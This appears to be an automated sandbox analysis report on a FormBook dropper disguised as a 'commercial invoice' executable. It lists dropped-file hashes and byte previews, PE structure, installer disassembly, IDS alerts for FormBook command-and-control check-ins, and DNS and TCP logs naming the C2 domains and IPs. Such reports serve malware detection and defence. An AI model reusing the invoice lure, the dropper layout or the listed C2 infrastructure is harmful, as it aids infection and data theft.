                                                SHA-256:5FFDD6983009916C7C223BED9D3EC43625D2FAA9ACAC5EB77C94EB9E4E0F9B7C
                                                SHA-512:CD99B3B91FFA401D7B0B63AF71A71258E5C2BBB2F646A519472F7D132B41B6FF4637D9C79429B5B87BB12CD79B20BDBA255543CEBA2C371214485AD94D04489B
                                                Malicious:false
                                                Reputation:low
                                                Preview: .(...DLJ2/f...^..6pV.z......w.....-....o.%.%o..(/r..Uq..(...w.......Z-..b.i......De..*..`.h....:.......p.....t..IXp.}OE..?.q..C2.$..Y........05_. *Y.......a^....M......3.GZ2i........-.;2.;E.f#5E.......l..F.h.....Wxc:...(. *..._.I.Ni._..=.=.4..[..jr`.DLJ2%...:.i.V"................Y.o.%.%..(/r..Uq..(...h...U...........+.%`._..z......LP.E.mQ\Cq.a...z..&_F....?.q....i...wC.M.y................(......0-D..q. $7.......r..^&2[..f.5E......R..$.M7.8.....Wxc.K...}(. ...._.I.{i._h.=.=.4..[..j.`.DLJ2'/..e.:.i.V....9.......-....o.%.%o..(/r..Uq..(...h...U...........+.%`._..z......LP.E.mQ\Cq.a...z..&_F....?.q....i...wC.M.y................(......0-D..q. $7Z2i..........&2[e>.f#5E......R..$..7.h.....Wxc.K...}(. ...._.I.{i._h.=.=.4..[..j.`.DLJ2'/..e.:.i.V....9.......-....o.%.%o..(/r..Uq..(...h...U...........+.%`._..z......LP.E.mQ\Cq.a...z..&_F....?.q....i...wC.M.y................(......0-D..q. $7Z2i..........&2[e>.f#5E......R..$..7.h.....Wxc.K...}(.
                                                C:\Users\user\AppData\Local\Temp\jfxtaknu
                                                Process:C:\Users\user\Desktop\commercial invoice_010202201.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):5330
                                                Entropy (8bit):6.086371908363251
                                                Encrypted:false
                                                SSDEEP:96:RmU+2u9ldYNo8rDVCQq92F6asT6+5biFZ1qqbPimfkDRhlsmI9ltzny:oyo4CQNFc6+9mHPxfkDPQ9ltzny
                                                MD5:F12ECFF391B1023285050810BDC99341
                                                SHA1:58BA5DB0B7549E0322C27A4857ED770E19A62E0A
                                                SHA-256:7D974A756128D4E8D74B20B947684264D6BB6ED85318E53AB78F40E3850642FA
                                                SHA-512:412D095C737BC53E8C2321FD87962F9AE98D6E9D76A9E4885B197821741DD6007A9445CD6DA28215A7F2895F16BC62037085E5E0101BD174E2E6C051B435F9ED
                                                Malicious:false
                                                Reputation:low
                                                Preview: .xMPP..........+.PE...E1..E...E1...+.P...hPPP.+.P..D..@......PPP..x..t..D..@......PPP.....|..D..@.....qPPP........D..@......PPP........@L...H...AA.D.........@..LQ..............L.Qr.@......A...L.......+.....Q.PPPP.LlKyY+...x....*....................@-..D.-....p..O....x.*..HEK...A+..PPPP..lLaPPP.LlCy.+........)...DP.....E...E1....H.P..D.p..H.P..@.<.......L.....H.P...H.O.........DP(>J....BPP.&BPP.<P(..u...BPP..BPP.HP(C.....BPP..BPP.HP.....hE...E1.....@PPP..x......P.>....PP.................<KPP.....H..H...P..Cx..Ct.....H...P..Cx..Ct.B.H...P..Kx.(..u...OPP..........E......H...........P.N.+.P.M...OPPP......LP......E...E1.....hPPP.........P.>....PP.................!LPP.E.PPP..H..H...P..C...C...D..H...P..C...C...@..H.....C...C...<Q..H*.rA..;...;......H...B..C...C..K.H...P..K..(>J....PPP...........8P.H.....8.O.=..8..<..@..D..H.].........P.N.+.P.M...OPPP......<P.....4...@PPP.........P.>....PP..................APP.....H..H...P..C...C...D..H...P..C...C..B.H...P..K..(C....mPPP..l.......F..
                                                C:\Users\user\AppData\Local\Temp\nshDF12.tmp
                                                Process:C:\Users\user\Desktop\commercial invoice_010202201.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):249957
                                                Entropy (8bit):7.72387519038227
                                                Encrypted:false
                                                SSDEEP:6144:0qGYAQ1nFCsyFJLgoA7MfkcSCTmhZF7Tr1OvXxn:mvQ1nFCvnwgccSCKhr7PMfZ
                                                MD5:99AB8465F038C2DA8124E3F0F8BD78CE
                                                SHA1:993EB2793FD14428E5837D9AB2A0B4F42E8CF173
                                                SHA-256:A67251D5421A9A027B490AB9ED4683BC1370EDD222C7DD2A697511781C75979C
                                                SHA-512:07D233F8FD0777843AB2A38EC59A679D52C3D638E84D61F20E4D889066B2EC4B5F4E17DDFB81A133133DDA1AA0153E7E24D04CB7B18F8DF6D800AFA52B4924C4
                                                Malicious:false
                                                Reputation:low
                                                Preview: .^......,........................H.......].......^..........................................................................................................................................................................................................................................J...................j...............................................................................................................................-.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Temp\nshDF13.tmp\uajs.dll
                                                Process:C:\Users\user\Desktop\commercial invoice_010202201.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):4608
                                                Entropy (8bit):4.170104009362266
                                                Encrypted:false
                                                SSDEEP:48:SpotIUM+bADhUYK0JKXIkuW2yH+ZsQMR7/iItlRuqSx:ZtGJDBdJ0FuoH+ZdcZxc
                                                MD5:85ABDE39747F6B521228F37BE34D4869
                                                SHA1:8B8F1C057D7369C6FEA384DAF46412F635DDF465
                                                SHA-256:900E115C271F29C66454E91F168BE012C2AE5D307C86B70E8D595E0BADE388C6
                                                SHA-512:7F36A7E83FD14924D365845608A9CD76F4ACCB425147E9F12D94A19FF5B50E3D6098E601FE08825AAFEF241B5A4296D7E287CC3FA794DC66C875B19DF850B01F
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 16%
                                                Reputation:low
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x-2..Ca..Ca..CaZ.Ma..Ca..B`..Ca..Ba..Ca.lG`..Ca.lC`..Ca.l.a..Ca.lA`..CaRich..Ca........PE..L......a...........!......................... ...............................P............@.......................... ..L....!.......0.......................@..\.................................................... ...............................text............................... ..`.rdata..l.... ......................@..@.rsrc........0......................@..@.reloc..\....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.924746340402354
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 92.16%
                                                • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:commercial invoice_010202201.exe
                                                File size:244072
                                                MD5:acbc7357e4fb7d8d4874ecbeb0c5bd0f
                                                SHA1:f423fed0f335e5c31d7b799aba25469420fb6009
                                                SHA256:73f458d7e38ab748b7b7d3b3e680db9eb08d845c1b1b7c935a6ee453d8f03358
                                                SHA512:f492401628f2970d3a0056091aea7b7af9938da1d885e0f1a2946f3fed84eb8d132de8f926345791444de7c72c8adbb150d19cd5f81acc8fa1a043d6b0edd17d
                                                SSDEEP:6144:owJUILHa3T7IFWaZHvyW8od2rrwPs4mAhN4ZY2rB3q:uILHIT7IY4vyW8o6wPs4mAhNORq
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

                                                File Icon

                                                Icon Hash:b2a88c96b2ca6a72

                                                Static PE Info

                                                General

                                                Entrypoint:0x403225
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                DLL Characteristics:
                                                Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:099c0646ea7282d232219f8807883be0

                                                Entrypoint Preview

                                                Instruction
                                                sub esp, 00000180h
                                                push ebx
                                                push ebp
                                                push esi
                                                xor ebx, ebx
                                                push edi
                                                mov dword ptr [esp+18h], ebx
                                                mov dword ptr [esp+10h], 00409128h
                                                xor esi, esi
                                                mov byte ptr [esp+14h], 00000020h
                                                call dword ptr [00407030h]
                                                push 00008001h
                                                call dword ptr [004070B4h]
                                                push ebx
                                                call dword ptr [0040727Ch]
                                                push 00000008h
                                                mov dword ptr [00423F58h], eax
                                                call 00007FDAE8BBCE90h
                                                mov dword ptr [00423EA4h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+34h]
                                                push 00000160h
                                                push eax
                                                push ebx
                                                push 0041F450h
                                                call dword ptr [00407158h]
                                                push 004091B0h
                                                push 004236A0h
                                                call 00007FDAE8BBCB47h
                                                call dword ptr [004070B0h]
                                                mov edi, 00429000h
                                                push eax
                                                push edi
                                                call 00007FDAE8BBCB35h
                                                push ebx
                                                call dword ptr [0040710Ch]
                                                cmp byte ptr [00429000h], 00000022h
                                                mov dword ptr [00423EA0h], eax
                                                mov eax, edi
                                                jne 00007FDAE8BBA35Ch
                                                mov byte ptr [esp+14h], 00000022h
                                                mov eax, 00429001h
                                                push dword ptr [esp+14h]
                                                push eax
                                                call 00007FDAE8BBC628h
                                                push eax
                                                call dword ptr [0040721Ch]
                                                mov dword ptr [esp+1Ch], eax
                                                jmp 00007FDAE8BBA3B5h
                                                cmp cl, 00000020h
                                                jne 00007FDAE8BBA358h
                                                inc eax
                                                cmp byte ptr [eax], 00000020h
                                                je 00007FDAE8BBA34Ch
                                                cmp byte ptr [eax], 00000022h
                                                mov byte ptr [eax+eax+00h], 00000000h

                                                Rich Headers

                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x900.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x59760x5a00False0.668619791667data6.46680044621IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rdata0x70000x11900x1200False0.444878472222data5.17796812871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x90000x1af980x400False0.55078125data4.68983486809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc0x2c0000x9000xa00False0.409375data3.94693169534IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_ICON0x2c1900x2e8dataEnglishUnited States
                                                RT_DIALOG0x2c4780x100dataEnglishUnited States
                                                RT_DIALOG0x2c5780x11cdataEnglishUnited States
                                                RT_DIALOG0x2c6980x60dataEnglishUnited States
                                                RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                                                RT_MANIFEST0x2c7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                Imports

                                                DLLImport
                                                KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                01/14/22-10:22:08.576968TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.4198.54.117.211
                                                01/14/22-10:22:08.576968TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.4198.54.117.211
                                                01/14/22-10:22:08.576968TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.4198.54.117.211
                                                01/14/22-10:22:13.804750TCP2031453ET TROJAN FormBook CnC Checkin (GET)4983980192.168.2.423.227.38.74
                                                01/14/22-10:22:13.804750TCP2031449ET TROJAN FormBook CnC Checkin (GET)4983980192.168.2.423.227.38.74
                                                01/14/22-10:22:13.804750TCP2031412ET TROJAN FormBook CnC Checkin (GET)4983980192.168.2.423.227.38.74
                                                01/14/22-10:22:13.878470TCP1201ATTACK-RESPONSES 403 Forbidden804983923.227.38.74192.168.2.4
                                                01/14/22-10:22:32.377131ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                                01/14/22-10:22:33.484922ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                                01/14/22-10:22:41.457348TCP2031453ET TROJAN FormBook CnC Checkin (GET)4984680192.168.2.434.102.136.180
                                                01/14/22-10:22:41.457348TCP2031449ET TROJAN FormBook CnC Checkin (GET)4984680192.168.2.434.102.136.180
                                                01/14/22-10:22:41.457348TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984680192.168.2.434.102.136.180
                                                01/14/22-10:22:41.572491TCP1201ATTACK-RESPONSES 403 Forbidden804984634.102.136.180192.168.2.4

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 14, 2022 10:21:35.378659964 CET4977280192.168.2.4198.54.117.211
                                                Jan 14, 2022 10:21:35.543638945 CET8049772198.54.117.211192.168.2.4
                                                Jan 14, 2022 10:21:35.543725014 CET4977280192.168.2.4198.54.117.211
                                                Jan 14, 2022 10:21:35.543859005 CET4977280192.168.2.4198.54.117.211
                                                Jan 14, 2022 10:21:35.708878994 CET8049772198.54.117.211192.168.2.4
                                                Jan 14, 2022 10:21:35.708903074 CET8049772198.54.117.211192.168.2.4
                                                Jan 14, 2022 10:21:41.027117968 CET4977480192.168.2.4118.67.131.217
                                                Jan 14, 2022 10:21:41.401885033 CET8049774118.67.131.217192.168.2.4
                                                Jan 14, 2022 10:21:41.402053118 CET4977480192.168.2.4118.67.131.217
                                                Jan 14, 2022 10:21:41.402209044 CET4977480192.168.2.4118.67.131.217
                                                Jan 14, 2022 10:21:41.784310102 CET8049774118.67.131.217192.168.2.4
                                                Jan 14, 2022 10:21:41.784333944 CET8049774118.67.131.217192.168.2.4
                                                Jan 14, 2022 10:21:41.784529924 CET4977480192.168.2.4118.67.131.217
                                                Jan 14, 2022 10:21:41.784611940 CET4977480192.168.2.4118.67.131.217
                                                Jan 14, 2022 10:21:42.153692961 CET8049774118.67.131.217192.168.2.4
                                                Jan 14, 2022 10:21:46.973463058 CET4979980192.168.2.4199.59.243.200
                                                Jan 14, 2022 10:21:46.992558002 CET8049799199.59.243.200192.168.2.4
                                                Jan 14, 2022 10:21:46.993942976 CET4979980192.168.2.4199.59.243.200
                                                Jan 14, 2022 10:21:47.487639904 CET4979980192.168.2.4199.59.243.200
                                                Jan 14, 2022 10:21:47.506217003 CET8049799199.59.243.200192.168.2.4
                                                Jan 14, 2022 10:21:47.595983028 CET8049799199.59.243.200192.168.2.4
                                                Jan 14, 2022 10:21:47.596030951 CET8049799199.59.243.200192.168.2.4
                                                Jan 14, 2022 10:21:47.596059084 CET8049799199.59.243.200192.168.2.4
                                                Jan 14, 2022 10:21:47.596086979 CET8049799199.59.243.200192.168.2.4
                                                Jan 14, 2022 10:21:47.596221924 CET4979980192.168.2.4199.59.243.200
                                                Jan 14, 2022 10:21:47.596268892 CET4979980192.168.2.4199.59.243.200
                                                Jan 14, 2022 10:21:47.603121042 CET4979980192.168.2.4199.59.243.200
                                                Jan 14, 2022 10:21:52.692037106 CET4981480192.168.2.42.57.90.16
                                                Jan 14, 2022 10:21:52.728557110 CET80498142.57.90.16192.168.2.4
                                                Jan 14, 2022 10:21:52.728773117 CET4981480192.168.2.42.57.90.16
                                                Jan 14, 2022 10:21:52.729005098 CET4981480192.168.2.42.57.90.16
                                                Jan 14, 2022 10:21:52.765433073 CET80498142.57.90.16192.168.2.4
                                                Jan 14, 2022 10:21:52.765479088 CET80498142.57.90.16192.168.2.4
                                                Jan 14, 2022 10:21:52.765491009 CET80498142.57.90.16192.168.2.4
                                                Jan 14, 2022 10:21:52.765662909 CET4981480192.168.2.42.57.90.16
                                                Jan 14, 2022 10:21:52.765780926 CET4981480192.168.2.42.57.90.16
                                                Jan 14, 2022 10:21:52.802203894 CET80498142.57.90.16192.168.2.4
                                                Jan 14, 2022 10:21:57.900244951 CET4981580192.168.2.4109.106.254.15
                                                Jan 14, 2022 10:21:58.062874079 CET8049815109.106.254.15192.168.2.4
                                                Jan 14, 2022 10:21:58.063052893 CET4981580192.168.2.4109.106.254.15
                                                Jan 14, 2022 10:21:58.063568115 CET4981580192.168.2.4109.106.254.15
                                                Jan 14, 2022 10:21:58.224841118 CET8049815109.106.254.15192.168.2.4
                                                Jan 14, 2022 10:21:58.224889040 CET8049815109.106.254.15192.168.2.4
                                                Jan 14, 2022 10:21:58.224917889 CET8049815109.106.254.15192.168.2.4
                                                Jan 14, 2022 10:21:58.224937916 CET8049815109.106.254.15192.168.2.4
                                                Jan 14, 2022 10:21:58.225161076 CET4981580192.168.2.4109.106.254.15
                                                Jan 14, 2022 10:21:58.225270033 CET4981580192.168.2.4109.106.254.15
                                                Jan 14, 2022 10:21:58.228662014 CET8049815109.106.254.15192.168.2.4
                                                Jan 14, 2022 10:21:58.228765011 CET4981580192.168.2.4109.106.254.15
                                                Jan 14, 2022 10:21:58.386159897 CET8049815109.106.254.15192.168.2.4
                                                Jan 14, 2022 10:22:08.408117056 CET4981780192.168.2.4198.54.117.211
                                                Jan 14, 2022 10:22:08.573241949 CET8049817198.54.117.211192.168.2.4
                                                Jan 14, 2022 10:22:08.576806068 CET4981780192.168.2.4198.54.117.211
                                                Jan 14, 2022 10:22:08.576967955 CET4981780192.168.2.4198.54.117.211
                                                Jan 14, 2022 10:22:08.744543076 CET8049817198.54.117.211192.168.2.4
                                                Jan 14, 2022 10:22:08.744561911 CET8049817198.54.117.211192.168.2.4
                                                Jan 14, 2022 10:22:13.787205935 CET4983980192.168.2.423.227.38.74
                                                Jan 14, 2022 10:22:13.804280043 CET804983923.227.38.74192.168.2.4
                                                Jan 14, 2022 10:22:13.804496050 CET4983980192.168.2.423.227.38.74
                                                Jan 14, 2022 10:22:13.804749966 CET4983980192.168.2.423.227.38.74
                                                Jan 14, 2022 10:22:13.821593046 CET804983923.227.38.74192.168.2.4
                                                Jan 14, 2022 10:22:13.878469944 CET804983923.227.38.74192.168.2.4
                                                Jan 14, 2022 10:22:13.878493071 CET804983923.227.38.74192.168.2.4
                                                Jan 14, 2022 10:22:13.878508091 CET804983923.227.38.74192.168.2.4
                                                Jan 14, 2022 10:22:13.878525019 CET804983923.227.38.74192.168.2.4
                                                Jan 14, 2022 10:22:13.878539085 CET804983923.227.38.74192.168.2.4
                                                Jan 14, 2022 10:22:13.878550053 CET804983923.227.38.74192.168.2.4
                                                Jan 14, 2022 10:22:13.878595114 CET4983980192.168.2.423.227.38.74
                                                Jan 14, 2022 10:22:13.878631115 CET804983923.227.38.74192.168.2.4
                                                Jan 14, 2022 10:22:13.878684044 CET4983980192.168.2.423.227.38.74
                                                Jan 14, 2022 10:22:13.878712893 CET4983980192.168.2.423.227.38.74
                                                Jan 14, 2022 10:22:13.878823042 CET4983980192.168.2.423.227.38.74
                                                Jan 14, 2022 10:22:19.023154974 CET4984280192.168.2.489.17.204.228
                                                Jan 14, 2022 10:22:19.082901001 CET804984289.17.204.228192.168.2.4
                                                Jan 14, 2022 10:22:19.082994938 CET4984280192.168.2.489.17.204.228
                                                Jan 14, 2022 10:22:19.083188057 CET4984280192.168.2.489.17.204.228
                                                Jan 14, 2022 10:22:19.141954899 CET804984289.17.204.228192.168.2.4
                                                Jan 14, 2022 10:22:19.142043114 CET804984289.17.204.228192.168.2.4
                                                Jan 14, 2022 10:22:19.142258883 CET4984280192.168.2.489.17.204.228
                                                Jan 14, 2022 10:22:19.142299891 CET804984289.17.204.228192.168.2.4
                                                Jan 14, 2022 10:22:19.142390013 CET4984280192.168.2.489.17.204.228
                                                Jan 14, 2022 10:22:19.200788021 CET804984289.17.204.228192.168.2.4

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 14, 2022 10:21:35.349164009 CET5802853192.168.2.48.8.8.8
                                                Jan 14, 2022 10:21:35.373434067 CET53580288.8.8.8192.168.2.4
                                                Jan 14, 2022 10:21:40.728118896 CET4925753192.168.2.48.8.8.8
                                                Jan 14, 2022 10:21:41.025860071 CET53492578.8.8.8192.168.2.4
                                                Jan 14, 2022 10:21:46.791608095 CET5172653192.168.2.48.8.8.8
                                                Jan 14, 2022 10:21:46.896753073 CET53517268.8.8.8192.168.2.4
                                                Jan 14, 2022 10:21:52.655163050 CET5653453192.168.2.48.8.8.8
                                                Jan 14, 2022 10:21:52.688127995 CET53565348.8.8.8192.168.2.4
                                                Jan 14, 2022 10:21:57.778915882 CET5662753192.168.2.48.8.8.8
                                                Jan 14, 2022 10:21:57.898154974 CET53566278.8.8.8192.168.2.4
                                                Jan 14, 2022 10:22:03.240422010 CET5662153192.168.2.48.8.8.8
                                                Jan 14, 2022 10:22:03.347357988 CET53566218.8.8.8192.168.2.4
                                                Jan 14, 2022 10:22:08.382899046 CET6311653192.168.2.48.8.8.8
                                                Jan 14, 2022 10:22:08.406914949 CET53631168.8.8.8192.168.2.4
                                                Jan 14, 2022 10:22:13.762855053 CET6407853192.168.2.48.8.8.8
                                                Jan 14, 2022 10:22:13.785531044 CET53640788.8.8.8192.168.2.4
                                                Jan 14, 2022 10:22:18.887667894 CET6480153192.168.2.48.8.8.8
                                                Jan 14, 2022 10:22:19.021996975 CET53648018.8.8.8192.168.2.4
                                                Jan 14, 2022 10:22:24.205677032 CET6172153192.168.2.48.8.8.8
                                                Jan 14, 2022 10:22:24.233356953 CET53617218.8.8.8192.168.2.4
                                                Jan 14, 2022 10:22:29.282247066 CET5125553192.168.2.48.8.8.8
                                                Jan 14, 2022 10:22:30.275973082 CET5125553192.168.2.48.8.8.8
                                                Jan 14, 2022 10:22:31.338468075 CET5125553192.168.2.48.8.8.8
                                                Jan 14, 2022 10:22:31.391388893 CET53512558.8.8.8192.168.2.4
                                                Jan 14, 2022 10:22:32.377043009 CET53512558.8.8.8192.168.2.4
                                                Jan 14, 2022 10:22:33.484662056 CET53512558.8.8.8192.168.2.4
                                                Jan 14, 2022 10:22:41.418489933 CET6152253192.168.2.48.8.8.8
                                                Jan 14, 2022 10:22:41.439188004 CET53615228.8.8.8192.168.2.4

                                                ICMP Packets

                                                TimestampSource IPDest IPChecksumCodeType
                                                Jan 14, 2022 10:22:32.377130985 CET192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                                                Jan 14, 2022 10:22:33.484921932 CET192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Jan 14, 2022 10:21:35.349164009 CET192.168.2.48.8.8.80x4541Standard query (0)www.answertitles.comA (IP address)IN (0x0001)
                                                Jan 14, 2022 10:21:40.728118896 CET192.168.2.48.8.8.80x9d14Standard query (0)www.friendschance.comA (IP address)IN (0x0001)
                                                Jan 14, 2022 10:21:46.791608095 CET192.168.2.48.8.8.80x941fStandard query (0)www.sfcshavedice.comA (IP address)IN (0x0001)
                                                Jan 14, 2022 10:21:52.655163050 CET192.168.2.48.8.8.80x126Standard query (0)www.rxvendorpills.onlineA (IP address)IN (0x0001)
                                                Jan 14, 2022 10:21:57.778915882 CET192.168.2.48.8.8.80x9e3bStandard query (0)www.ludowinners.onlineA (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:03.240422010 CET192.168.2.48.8.8.80x3ce1Standard query (0)www.controle-fiscal.comA (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:08.382899046 CET192.168.2.48.8.8.80xa528Standard query (0)www.stardomfrokch.xyzA (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:13.762855053 CET192.168.2.48.8.8.80x66fdStandard query (0)www.toposales.comA (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:18.887667894 CET192.168.2.48.8.8.80xfc88Standard query (0)www.survival-hunter.comA (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:24.205677032 CET192.168.2.48.8.8.80x4a3aStandard query (0)www.cloudtotaal.comA (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:29.282247066 CET192.168.2.48.8.8.80x80efStandard query (0)www.moldluck.comA (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:30.275973082 CET192.168.2.48.8.8.80x80efStandard query (0)www.moldluck.comA (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:31.338468075 CET192.168.2.48.8.8.80x80efStandard query (0)www.moldluck.comA (IP address)IN (0x0001)
                                                Jan 14, 2022 10:22:41.418489933 CET192.168.2.48.8.8.80xd029Standard query (0)www.laraful.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Jan 14, 2022 10:20:53.958759069 CET8.8.8.8192.168.2.40x52b2No error (0)a-0019.a.dns.azurefd.neta-0019.standard.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                Jan 14, 2022 10:21:35.373434067 CET8.8.8.8192.168.2.40x4541No error (0)www.answertitles.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
